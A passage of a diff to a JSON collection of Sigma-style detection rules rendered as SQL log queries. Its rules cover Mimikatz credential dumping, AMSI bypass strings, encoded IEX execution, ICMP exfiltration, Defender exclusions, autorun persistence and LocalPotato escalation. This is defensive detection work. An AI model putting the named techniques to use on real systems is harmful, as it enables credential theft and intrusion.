'\\' AND (ScriptBlockText LIKE '%Windows Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Web Credentials%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'megasync.exe' AND NOT (NewProcessName LIKE '%\\\\megasync.exe' ESCAPE '\\'))" ], - 
"filename": "posh_ps_enumerate_password_windows_credential_manager.yml" + "filename": "proc_creation_win_renamed_megasync.yml" }, { - "title": "Potential In-Memory Execution Using Reflection.Assembly", - "id": "ddcd88cb-7f62-4ce5-86f9-1704190feb0a", + "title": "Suspicious Extrac32 Execution", + "id": "aa8e035d-7be4-48d3-a944-102aec04400d", "status": "experimental", - "description": "Detects usage of \"Reflection.Assembly\" load functions to dynamically load assemblies in memory", + "description": "Download or Copy file with Extrac32", "author": "frack113", + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], "falsepositives": [ - "Legitimate use of the library" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Reflection.Assembly]::load%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR OriginalFileName = 'extrac32.exe') AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND (CommandLine LIKE '%/C%' ESCAPE '\\' OR CommandLine LIKE '%/Y%' ESCAPE '\\' OR CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "posh_ps_dotnet_assembly_from_file.yml" + "filename": "proc_creation_win_lolbin_extrac32.yml" }, { - "title": "Suspicious Invoke-Item From Mount-DiskImage", - "id": "902cedee-0398-4e3a-8183-6f3a89773a96", + "title": "Direct Autorun Keys Modification", + "id": "24357373-078f-44ed-9ac4-6d334a668a11", "status": "test", - "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", - "author": "frack113", + "description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.", + "author": "Victor Sergeev, 
Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1553.005" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", + "Legitimate administrator sets up autorun keys for legitimate reasons.", + "Discord" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Mount-DiskImage %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ImagePath %' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-Volume%' ESCAPE '\\' AND ScriptBlockText LIKE '%.DriveLetter%' ESCAPE '\\' AND ScriptBlockText LIKE '%invoke-item %' ESCAPE '\\' AND ScriptBlockText LIKE '%):\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' OR CommandLine LIKE '%\\\\system\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\'))" ], - "filename": "posh_ps_run_from_mount_diskimage.yml" + "filename": "proc_creation_win_reg_direct_asep_registry_keys_modification.yml" }, { - "title": "Potential Invoke-Mimikatz PowerShell Script", - "id": "189e3b02-82b2-4b90-9662-411eb64486d4", + "title": "Remote 
Access Tool - RURAT Execution From Unusual Location", + "id": "e01fa958-6893-41d4-ae03-182477c5e77d", "status": "experimental", - "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", - "author": "Tim Rauch", + "description": "Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\\Program Files')", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.defense_evasion" ], "falsepositives": [ - "Mimikatz can be useful for testing the security of networks" + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rfusclient.exe' ESCAPE '\\') OR Product = 'Remote Utilities') AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Remote Utilities%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Remote Utilities%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_remote_access_tools_rurat_non_default_location.yml" + }, + { + "title": "Regedit as Trusted Installer", + "id": "883835a7-df45-43e4-bf1d-4268768afda4", + "status": "test", + "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_regedit_trustedinstaller.yml" + }, + { + "title": "HackTool - PCHunter 
Execution", + "id": "fca949cc-79ca-446e-8064-01aa7e52ece5", + "status": "experimental", + "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "falsepositives": [ + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE '%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR Hashes LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN 
('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN ('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" ], - "filename": "posh_ps_potential_invoke_mimikatz.yml" + "filename": "proc_creation_win_hktl_pchunter.yml" }, { - "title": "Potential AMSI Bypass Using NULL Bits - ScriptBlockLogging", - "id": "fa2559c8-1197-471d-9cdd-05a0273d4522", + "title": "HackTool - LocalPotato Execution", + "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", "status": "experimental", - "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", + "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.privilege_escalation", + "cve.2023.21746" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockLogging LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR ScriptBlockLogging LIKE '%#%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN ('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" ], - "filename": "posh_ps_amsi_null_bits_bypass.yml" + "filename": "proc_creation_win_hktl_localpotato.yml" }, { - "title": "Windows PowerShell Upload Web Request", - "id": 
"d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", + "title": "Lolbin Runexehelper Use As Proxy", + "id": "cd71385d-fd9b-4691-9b98-2b1f7e508714", "status": "experimental", - "description": "Detects the use of various web request POST or PUT methods (including aliases) via Windows PowerShell command", + "description": "Detect usage of the \"runexehelper.exe\" binary as a proxy to launch other programs", "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1020" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText LIKE '%iwr %' ESCAPE '\\') AND ScriptBlockText LIKE '%-Method %' ESCAPE '\\' AND (ScriptBlockText LIKE '% Put %' ESCAPE '\\' OR ScriptBlockText LIKE '% Post %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\runexehelper.exe' ESCAPE '\\')" ], - "filename": "posh_ps_upload.yml" + "filename": "proc_creation_win_lolbin_runexehelper.yml" }, { - "title": "Change User Agents with WebRequest", - "id": "d4488827-73af-4f8d-9244-7b7662ef046e", - "status": "experimental", - "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.\nCommands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n", - "author": "frack113", + "title": "Suspicious Call by Ordinal", + "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", + "status": "stable", + "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", + "author": "Florian Roth (Nextron Systems)", "tags": [ - 
"attack.command_and_control", - "attack.t1071.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment", + "Windows control panel elements have been identified as source (mmc)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '%-UserAgent %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE '%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" ], - "filename": "posh_ps_susp_invoke_webrequest_useragent.yml" + "filename": "proc_creation_win_rundll32_by_ordinal.yml" }, { - "title": "Suspicious X509Enrollment - Ps Script", - "id": "504d63cb-0dba-4d02-8531-e72981aace2c", + "title": "Suspicious PowerShell IEX Execution Patterns", + "id": "09576804-7a05-458e-a817-eb718ca91f54", "status": "experimental", - "description": "Detect use of X509Enrollment", - "author": "frack113", + "description": "Detects suspicious ways to run 
Invoke-Execution using IEX alias", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate administrative script" + "Legitimate scripts that use IEX" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE '\\' OR ScriptBlockText LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE '\\' OR CommandLine LIKE '% | iex}%' ESCAPE '\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX -Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%.GetString([System.Convert]::%' ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" ], - "filename": "posh_ps_x509enrollment.yml" + "filename": "proc_creation_win_powershell_iex_patterns.yml" }, { - "title": "Powershell LocalAccount Manipulation", - "id": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", + "title": "Potential Snatch Ransomware Activity", + "id": "5325945e-f1f0-406e-97b8-65104d393fff", + "status": "stable", + "description": "Detects specific process characteristics of Snatch ransomware word document droppers", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1204" + ], + "falsepositives": [ + "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" + ], + 
"level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%shutdown /r /f /t 00%' ESCAPE '\\' OR CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_malware_snatch_ransomware.yml" + }, + { + "title": "Rar Usage with Password and Compression Level", + "id": "faa48cae-6b25-4f00-a094-08947fef582f", "status": "test", - "description": "Adversaries may manipulate accounts to maintain access to victim systems.\nAccount manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups\n", - "author": "frack113", + "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", + "author": "@ROxPinTeddy", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Legitimate administrative script" + "Legitimate use of Winrar command line version", + "Other command line tools, that use these flags" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Disable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-LocalUser%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% -hp%' ESCAPE '\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE '% a %' ESCAPE '\\'))" ], - "filename": 
"posh_ps_localuser.yml" + "filename": "proc_creation_win_rar_compression_with_password.yml" }, { - "title": "PowerShell WMI Win32_Product Install MSI", - "id": "91109523-17f0-4248-a800-f81d9e7c081d", - "status": "experimental", - "description": "Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class", + "title": "Changing Existing Service ImagePath Value Via Reg.EXE", + "id": "9b0b7ac3-6223-47aa-a3fd-e8f211e637db", + "status": "test", + "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.007" + "attack.persistence", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-CimMethod %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName %' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Product %' ESCAPE '\\' AND ScriptBlockText LIKE '%-MethodName %' ESCAPE '\\' AND ScriptBlockText LIKE '%.msi%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '% ImagePath %' ESCAPE '\\' AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\'))" ], - "filename": "posh_ps_win32_product_install_msi.yml" + "filename": 
"proc_creation_win_reg_service_imagepath_change.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell", - "id": "20e5497e-331c-4cd5-8d36-935f6e2a9a07", - "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "title": "Suspicious GUP Usage", + "id": "0a4f6091-223b-41f6-8743-f322ec84930b", + "status": "test", + "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (ScriptBlockText LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR ScriptBlockText LIKE '%system.io.streamreader%' ESCAPE '\\') AND ScriptBlockText LIKE '%readtoend' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" ], - "filename": "posh_ps_invoke_obfuscation_via_compress.yml" + 
"filename": "proc_creation_win_gup_suspicious_execution.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", - "id": "73e67340-0d25-11eb-adc1-0242ac120002", + "title": "Whoami.EXE Execution Anomaly", + "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects the execution of whoami.exe with suspicious parent processes.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentProcessName = '') OR (ParentProcessName = '')))" ], - "filename": "posh_ps_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_whoami_parent_anomaly.yml" }, { - "title": "Suspicious Eventlog Clear", - "id": "0f017df3-8f5a-414f-ad6b-24aff1128278", + "title": "Powershell Defender Exclusion", + "id": 
"17769c90-230e-488b-a463-e05c08e9d48f", "status": "experimental", - "description": "Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the windows event logs", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1070.001" + "attack.t1562.001" ], "falsepositives": [ - "Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate" + "Possible Admin Activity", + "Other Cmdlets that may use the same parameters" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Clear-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Limit-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Clear-WinEvent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Add-MpPreference %' ESCAPE '\\' OR CommandLine LIKE '%Set-MpPreference %' ESCAPE '\\') AND (CommandLine LIKE '% -ExclusionPath %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionExtension %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionProcess %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionIpAddress %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_clear_eventlog.yml" + "filename": "proc_creation_win_powershell_defender_exclusion.yml" }, { - "title": "PowerShell ICMP Exfiltration", - "id": "4c4af3cd-2115-479c-8193-6b8bfce9001c", - "status": "test", - "description": "Detects Exfiltration Over Alternative Protocol - ICMP. 
Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.", - "author": "Bartlomiej Czyz @bczyz1, oscd.community", - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ], + "title": "Suspicious Process Parents", + "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", + "status": "experimental", + "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate usage of System.Net.NetworkInformation.Ping class" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Net.NetworkInformation.Ping%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Send(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (NewProcessName = '')))))" ], - "filename": "posh_ps_icmp_exfiltration.yml" + "filename": 
"proc_creation_win_susp_parents.yml" }, { - "title": "Testing Usage of Uncommonly Used Port", - "id": "adf876b3-f1f8-4aa9-a4e4-a64106feec06", + "title": "Potential PowerShell Command Line Obfuscation", + "id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", "status": "test", - "description": "Adversaries may communicate using a protocol and port paring that are typically not associated.\nFor example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.\n", - "author": "frack113", + "description": "Detects the PowerShell command lines with special characters", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", "tags": [ - "attack.command_and_control", - "attack.t1571" + "attack.execution", + "attack.defense_evasion", + "attack.t1027", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrative script" 